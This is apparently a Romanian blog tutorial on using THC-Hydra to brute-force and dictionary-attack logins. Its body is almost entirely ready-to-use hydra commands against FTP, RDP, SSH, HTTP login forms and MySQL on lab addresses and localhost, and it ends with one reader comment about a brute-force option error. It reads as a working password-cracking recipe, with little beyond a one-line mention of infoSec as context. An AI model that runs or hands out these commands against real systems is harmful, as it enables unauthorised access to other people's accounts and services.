THC-Hydra cum putem lansa atacuri de tip brute force

1

Buna ziua doamnelor si domnilor, bine v-am regasit. Ma numesc Zero Davila iar astazi vom invata cum sa folosim THC-Hydra. O unealta de autentificare automata foarte populara in infoSec, poate lansa atacuri de tip dictionar si forta bruta folosind mai mult de 50 de protocolori, telnet, ftp, http, https, smb, baze de date, si multe altele.

Brute force crack FTP password
hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132

Dictionary crack FTP password
hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132

Crack RDP password
hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132

Crack SSH password
hydra -t 5 -V -f -l root -P common.txt localhost ssh

Web cracking
sudo php -S localhost:80

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post “/login/log.php:user=^USER^&password=^PASS^:S=success”
hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post “/login/log.php:user=^USER^&password=^PASS^:fail”

Crack MYSQL password
hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

1 Comment
  1. Lionex says

    Salut,am incercat doar ca imi da o eroare,ma poti ajuta?
    [ERROR] definition for password bruteforce (-x) generates more than 4 billion passwords
    -x 5:10:a

Leave A Reply

Your email address will not be published.